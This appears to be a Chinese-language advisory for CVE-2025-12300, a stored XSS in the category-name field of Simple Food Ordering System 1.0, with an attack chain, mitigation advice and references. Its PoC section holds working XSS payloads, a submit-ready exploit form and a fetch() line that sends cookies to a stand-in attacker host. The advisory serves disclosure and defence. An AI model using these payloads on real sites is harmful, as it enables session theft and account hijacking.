CVE-2025-12300 Simple Food Ordering System 1.0 XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12300

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Simple Food Ordering System 1.0

漏洞概述

CVE-2025-12300是code-projects团队开发的Simple Food Ordering System 1.0版本中存在的一个跨站脚本（XSS）漏洞。该漏洞位于/addcategory.php文件的cname参数处理逻辑中，由于应用程序在处理用户输入时未对特殊字符进行充分的过滤和转义，导致攻击者可以在添加食品类别的功能点注入恶意的JavaScript代码。该漏洞具有远程利用特性，攻击者无需认证即可发起攻击，但需要诱导受害者进行某些交互操作。CVSS评分4.3属于中等严重程度，主要影响系统的完整性和机密性。由于该漏洞的利用代码已公开，攻击者可以轻易获取并使用，对使用该系统的餐饮企业网站构成实际威胁。攻击成功后可窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。

技术细节

该漏洞属于存储型XSS（Stored XSS）漏洞，攻击向量为网络远程利用。漏洞产生的根本原因在于/addcategory.php文件中的cname参数处理逻辑存在输入验证不足的问题。当用户提交类别名称（cname参数）时，应用程序直接将用户输入的数据存储到数据库中，而未对特殊HTML字符（如<、>、'、"等）进行HTML实体编码或转义处理。在后续页面加载时，存储的恶意脚本会被浏览器作为正常HTML/JavaScript执行，从而实现跨站脚本攻击。攻击者可以利用此漏洞注入JavaScript代码，这些代码会在其他用户访问相关页面时自动执行。由于攻击代码被永久存储在服务器端，所有访问受影响页面的用户都会受到攻击影响。CVSS向量显示该漏洞需要用户交互（UI:R），表明攻击者需要诱导受害者访问恶意构造的页面才能完成攻击。

攻击链分析

STEP 1

步骤1

攻击者构造恶意XSS payload，通过POST请求向/addcategory.php的cname参数注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 2

步骤2

应用程序将恶意payload未经转义直接存储到数据库的类别表中

STEP 3

步骤3

当管理员或其他用户访问显示类别列表的页面时，服务器从数据库读取类别名称并直接输出到HTML页面中

STEP 4

步骤4

受害者浏览器将存储的<script>标签作为有效脚本执行，导致XSS攻击成功

STEP 5

步骤5

恶意脚本执行后，攻击者可窃取用户会话cookie、劫持用户账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12300 PoC - Simple Food Ordering System 1.0 XSS -->
<!-- Target: /addcategory.php (cname parameter) -->

<!-- Step 1: Inject malicious script via cname parameter -->
<!-- POST /addcategory.php HTTP/1.1 -->
<!-- Host: target.com -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- -->
<!-- cname=<script>alert(document.cookie)</script> -->

<!-- Step 2: When admin/user views category list, XSS executes -->
<!-- <script>alert(document.cookie)</script> will be rendered -->

<!-- More advanced payload for session hijacking -->
<!-- cname=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> -->

<!-- PoC HTML Form -->
<form action="http://target.com/addcategory.php" method="POST">
    <input type="hidden" name="cname" value="<script>alert('XSS CVE-2025-12300')</script>">
    <input type="submit" value="Exploit">
</form>

影响范围

Simple Food Ordering System 1.0

防御指南

临时缓解措施

在修复补丁发布前，可采取以下临时缓解措施：1) 暂时禁用/addcategory.php功能或限制只有可信用户可访问；2) 在Web服务器层面配置输入过滤规则，拦截包含<script>等XSS特征的请求；3) 实施严格的访问控制，要求用户认证后才能访问管理功能；4) 使用Web应用防火墙规则阻止常见的XSS攻击模式；5) 监控日志关注异常的类别添加请求；6) 对管理员进行安全意识培训，提醒不要点击可疑链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12300
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12300
3 Details https://www.cvedetails.com/cve/CVE-2025-12300/
4 VulDB https://vuldb.com/cve/CVE-2025-12300
5 Link https://code-projects.org/
6 Link https://github.com/underatted/CVE/issues/20
7 Link https://vuldb.com/?ctiid.329972
8 Link https://vuldb.com/?id.329972
9 Link https://vuldb.com/?submit.676012